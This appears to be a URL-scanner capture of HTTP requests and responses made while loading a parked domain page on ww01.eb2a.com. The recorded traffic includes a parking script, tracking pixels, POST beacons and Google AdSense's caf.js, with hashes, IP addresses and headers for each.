GET /?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue HTTP/1.1
Host: ww01.eb2a.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.ibayme.eb2a.com/
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Date: Sun, 07 May 2023 15:12:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: parking_session=6dd70548-648c-324d-7dce-72428613930e; expires=Sun, 07-May-2023 15:27:09 GMT; Max-Age=900; path=/; HttpOnly
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_V+Q/q0xrPrTevgg3J2ZZBOfuBjv+uduCMyqHwp6117ms3mZcprnv1in/7sAxmQW8FKSvQjZR+yGMiX7CqnZxhg==
Accept-CH: sec-ch-prefers-color-scheme
Critical-CH: sec-ch-prefers-color-scheme
Vary: sec-ch-prefers-color-scheme
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
ww01.eb2a.com/js/parking.2.104.9.js
199.59.243.223200 OK 22 kB URL GET HTTP/1.1 ww01.eb2a.com/js/parking.2.104.9.js
IP 199.59.243.223:80
Requested by http://ww01.eb2a.com/?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
File type HTML document, ASCII text, with very long lines (65536), with no line terminators
Hash 4373b6882998614499e168219b1e44ca
6591de3f6d18020cc8de3549f9a87115b44bea8b
e93edbb073fa2a6feedcdcec64b6d6b2f9e85b481f11ad8f5a66facac76cb101
GET /js/parking.2.104.9.js HTTP/1.1
Host: ww01.eb2a.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: http://ww01.eb2a.com/?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
Cookie: parking_session=6dd70548-648c-324d-7dce-72428613930e
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Date: Sun, 07 May 2023 15:12:09 GMT
Content-Type: application/javascript; charset=utf-8
Last-Modified: Wed, 03 May 2023 19:31:27 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
ww01.eb2a.com/_fd?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
199.59.243.223200 OK 211 B URL POST HTTP/1.1 ww01.eb2a.com/_fd?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
IP 199.59.243.223:80
Requested by http://ww01.eb2a.com/?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
File type ASCII text, with no line terminators
Hash 4e30672eaff6745667e030e8d88dd452
8e121ad51857eecf0a76fbe10ce2377d5e34bc07
08537d74c9f9f829f6b42bc68c8f82828dd87df73b16b5ff1c26fd3ce04e1f43
POST /_fd?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue HTTP/1.1
Host: ww01.eb2a.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://ww01.eb2a.com/?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
Content-Type: application/json
Origin: http://ww01.eb2a.com
DNT: 1
Connection: keep-alive
Cookie: parking_session=6dd70548-648c-324d-7dce-72428613930e
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
HTTP/1.1 200 OK
Server: openresty
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Date: Sun, 07 May 2023 15:12:09 GMT
X-Version: 2.104.9
Set-Cookie: parking_session=6dd70548-648c-324d-7dce-72428613930e; expires=Sun, 07-May-2023 15:27:09 GMT; Max-Age=900; path=/; httponly
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
ww01.eb2a.com/px.gif?ch=1&rn=2.670978036161375
199.59.243.223200 OK 42 B URL GET HTTP/1.1 ww01.eb2a.com/px.gif?ch=1&rn=2.670978036161375
IP 199.59.243.223:80
Requested by http://ww01.eb2a.com/?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
File type GIF image data, version 89a, 1 x 1\012- data
Hash d89746888da2d9510b64a9f031eaecd5
d5fceb6532643d0d84ffe09c40c481ecdf59e15a
ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
GET /px.gif?ch=1&rn=2.670978036161375 HTTP/1.1
Host: ww01.eb2a.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: http://ww01.eb2a.com/?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
Cookie: parking_session=6dd70548-648c-324d-7dce-72428613930e
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Date: Sun, 07 May 2023 15:12:09 GMT
Content-Type: image/gif
Content-Length: 42
Last-Modified: Wed, 15 Sep 2021 19:38:30 GMT
Connection: keep-alive
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Accept-Ranges: bytes
ww01.eb2a.com/px.gif?ch=2&rn=2.670978036161375
199.59.243.223200 OK 42 B URL GET HTTP/1.1 ww01.eb2a.com/px.gif?ch=2&rn=2.670978036161375
IP 199.59.243.223:80
Requested by http://ww01.eb2a.com/?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
File type GIF image data, version 89a, 1 x 1\012- data
Hash d89746888da2d9510b64a9f031eaecd5
d5fceb6532643d0d84ffe09c40c481ecdf59e15a
ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
GET /px.gif?ch=2&rn=2.670978036161375 HTTP/1.1
Host: ww01.eb2a.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: http://ww01.eb2a.com/?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
Cookie: parking_session=6dd70548-648c-324d-7dce-72428613930e
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Date: Sun, 07 May 2023 15:12:09 GMT
Content-Type: image/gif
Content-Length: 42
Last-Modified: Wed, 15 Sep 2021 19:38:30 GMT
Connection: keep-alive
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Accept-Ranges: bytes
ww01.eb2a.com/favicon.ico
199.59.243.223200 OK 0 B URL GET HTTP/1.1 ww01.eb2a.com/favicon.ico
IP 199.59.243.223:80
Requested by http://ww01.eb2a.com/?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /favicon.ico HTTP/1.1
Host: ww01.eb2a.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: http://ww01.eb2a.com/?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
Cookie: parking_session=6dd70548-648c-324d-7dce-72428613930e
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Date: Sun, 07 May 2023 15:12:10 GMT
Content-Type: image/x-icon
Content-Length: 0
Last-Modified: Wed, 15 Sep 2021 19:38:30 GMT
Connection: keep-alive
ETag: "61424bb6-0"
x-backend-server: ip-10-201-16-216.ec2.internal
Accept-Ranges: bytes
ww01.eb2a.com/_tr
199.59.243.223200 OK 22 B IP 199.59.243.223:80
Requested by http://ww01.eb2a.com/?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
File type ASCII text, with no line terminators
Hash 5cfde9b47de2d84bd26fc473632647c0
fd53c70631b6068328be57daec71bd94bf004d41
47fd05ef74fef5da03fa22483e63fc977cad8e026ae41dadbbcc3745907f306b
POST /_tr HTTP/1.1
Host: ww01.eb2a.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://ww01.eb2a.com/?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
Content-Type: application/json
Content-Length: 1353
Origin: http://ww01.eb2a.com
DNT: 1
Connection: keep-alive
Cookie: parking_session=6dd70548-648c-324d-7dce-72428613930e
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Date: Sun, 07 May 2023 15:12:10 GMT
X-Version: 2.104.9
Set-Cookie: parking_session=6dd70548-648c-324d-7dce-72428613930e; expires=Sun, 07-May-2023 15:27:10 GMT; Max-Age=900; path=/; httponly
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
www.google.com/adsense/domains/caf.js
142.250.74.164200 OK 148 kB URL GET HTTP/3 www.google.com/adsense/domains/caf.js
IP 142.250.74.164:443
Requested by http://ww01.eb2a.com/?pid=9POT3387I&pbsubid=1582a58e-2cfa-ec8f-97c8-1df1b55c945f&noads=http%3A%2F%2Fww01.eb2a.com%2F%3Fskipskenzo%3Dtrue
Certificate IssuerGoogle Trust Services LLC
Subject*.google.com
FingerprintA3:4E:A3:86:10:DA:6C:D1:8C:73:54:AB:E6:8F:7D:21:72:2C:B4:D5
ValidityMon, 17 Apr 2023 08:16:32 GMT - Mon, 10 Jul 2023 08:16:31 GMT
File type ASCII text, with very long lines (2125)
Size 148 kB (147929 bytes)
Hash d881947769336f52fe658ba09c0d4c0e
9a70d2e2f88177c09cd0b3189c3cfbe510c6958b
69aecdbc51125ae0d89680120aebe1dd469e3449fae524293c2930fbcf3e8970
GET /adsense/domains/caf.js HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: http://ww01.eb2a.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
HTTP/3 200 OK
accept-ranges: bytes
vary: Accept-Encoding
content-type: text/javascript; charset=UTF-8
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/ads-afs-ui
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="ads-afs-ui"
report-to: {"group":"ads-afs-ui","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/ads-afs-ui"}]}
date: Sun, 07 May 2023 15:12:10 GMT
expires: Sun, 07 May 2023 15:12:10 GMT
cache-control: private, max-age=3600
etag: "16991164960581895730"
x-content-type-options: nosniff
content-encoding: gzip
server: sffe
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000